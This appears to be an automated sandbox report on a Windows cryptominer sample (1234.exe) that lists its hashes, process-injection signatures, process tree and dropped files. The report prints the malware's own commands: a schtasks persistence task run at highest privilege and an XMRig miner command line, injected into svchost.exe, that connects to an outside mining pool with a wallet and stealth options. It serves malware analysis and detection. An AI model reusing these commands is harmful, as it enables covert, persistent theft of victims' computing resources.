Analysis
max time kernel: 131s
max time network: 121s
platform: windows7_x64
resource: win7-en-20211104
submitted: 06-12-2021 07:10

Static task: static1
Behavioral task: behavioral1
Sample: 1234.exe
Resource: win7-en-20211104
General
Target: 1234.exe
Size: 2.1MB
MD5: 8f7758d7ca504da8622fa77de521ac56
SHA1: 33a94c3a952f75695f57a712074941642f6f948f
SHA256: 1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512: a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0
Malware Config
Signatures

XMRig Miner Payload (12 IoCs)
Processes (resource / yara rule):
  behavioral1/memory/1732-83-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-84-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-85-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-86-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-87-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-88-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-89-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-90-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-91-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-92-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
  behavioral1/memory/1732-93-0x000000014030F3F8-mapping.dmp  xmrig
  behavioral1/memory/1732-95-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig

Executes dropped EXE (2 IoCs)
Processes (pid / process):
  976   services64.exe
  1700  sihost64.exe

Loads dropped DLL (4 IoCs)
Processes (pid / process):
  804   cmd.exe
  804   cmd.exe
  1536  conhost.exe
  1536  conhost.exe

Suspicious use of SetThreadContext (1 IoC)
Processes (description / pid / process / target process):
  PID 1536 set thread context of 1732   1536  conhost.exe  svchost.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes (pid / process):
  784   conhost.exe
  1536  conhost.exe
  1536  conhost.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege  784   conhost.exe
  Token: SeDebugPrivilege  1536  conhost.exe

Suspicious use of WriteProcessMemory (43 IoCs)
Processes (source pid / source process -> target pid / target process / number of events):
  1592  1234.exe        -> 784   conhost.exe      4
  784   conhost.exe     -> 1932  cmd.exe          3
  1932  cmd.exe         -> 1160  schtasks.exe     3
  784   conhost.exe     -> 804   cmd.exe          3
  804   cmd.exe         -> 976   services64.exe   3
  976   services64.exe  -> 1536  conhost.exe      4
  1536  conhost.exe     -> 1700  sihost64.exe     3
  1536  conhost.exe     -> 1732  svchost.exe     16
  1700  sihost64.exe    -> 1880  conhost.exe      4
Processes (indented by depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\1234.exe  (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\1234.exe"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\conhost.exe  (depth 2)
    Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1234.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe  (depth 3)
      Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\schtasks.exe  (depth 4)
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
        - Creates scheduled task(s)

    C:\Windows\System32\cmd.exe  (depth 3)
      Command line: "cmd" cmd /c "C:\Users\Admin\services64.exe"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\services64.exe  (depth 4)
        Command line: C:\Users\Admin\services64.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\conhost.exe  (depth 5)
          Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
          - Loads dropped DLL
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe  (depth 6)
            Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\conhost.exe  (depth 7)
              Command line: "C:\Windows\System32\conhost.exe" "/sihost64"

          C:\Windows\System32\svchost.exe  (depth 6)
            Command line: C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=https://pool.hashvault.pro:80 --user=47mixi7RkAmR8pVCzjuTCzVLg6GDsYJGpCEZQ4fDgwfVMBZB4djECiyDZEX6vLmQ4p3KNLUUdiNtaECKeZ9Sb6EvGRJCt7s --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=100 --tls --cinit-stealth
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: 6f47627be7e8a255543a4f2be8003f83
  SHA1: fc5fb148155738d8224103c15a8ef66569be1e10
  SHA256: cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c
  SHA512: 22cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62

C:\Users\Admin\services64.exe
  MD5: 8f7758d7ca504da8622fa77de521ac56
  SHA1: 33a94c3a952f75695f57a712074941642f6f948f
  SHA256: 1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
  SHA512: a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0